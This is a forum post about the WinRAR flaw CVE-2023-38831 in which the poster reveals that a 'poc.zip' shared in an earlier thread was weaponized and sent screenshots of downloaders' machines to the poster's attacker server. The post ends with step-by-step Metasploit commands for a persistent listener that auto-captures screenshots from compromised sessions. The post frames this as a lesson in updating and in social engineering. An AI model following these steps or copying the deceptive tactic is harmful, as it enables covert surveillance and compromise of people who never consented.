Discussion: CVE-2023-38831 pt.2 - This is why you must update your WinRAR copy

Status
Thread closed to further replies.

Netcat

Jade User
17 January 2022
These screenshots came from several VMs; these OSes are likely honeypots with no sensitive data, from unknown guys who downloaded and tested "poc.zip". In my previous thread about CVE-2023-38831, I stated the payload is going to grab a screenshot from the target device, but what I "forgot" to tell you... these screenshots are saved on my attacker server, not your VM. This is how social engineering works: the combination of a legitimate-looking file and some tricky words... You got pwned.

However, this attack was stupid, serving as a mere example. In a real-world scenario, you can expect something way more nasty than a simple screen-stealer payload, like ransomware, and more scamming tactics to get their hands on your device. I hope you got cringed enough today, cya.

[UPDATE: poc.zip malicious attachment no longer "weaponized" in previous thread, because the attacker server is off] :)

The screenshots were collected passively, without user interaction, exploiting a special Linux+MSF listener configuration:
to emulate my gathering technique, type in your terminal
"screen"
in that screen session, run msfconsole
type "AutoRunScript -> multi_console_command -c screenshot"
set "ExitOnSession -> false"
exploit -j
Now, hold "ctrl+d" to detach this channel from terminal
type "screen -ls" to display current screen session
screen -r [PID] to connect back the detached session, to check listener status

Configured in this way, your MSF instance will run in an isolated thread forever; this thread will not crash even if your SSH session dies. You can fly for holidays while your server will passively grab screenshots for you, as long as it's running.
 
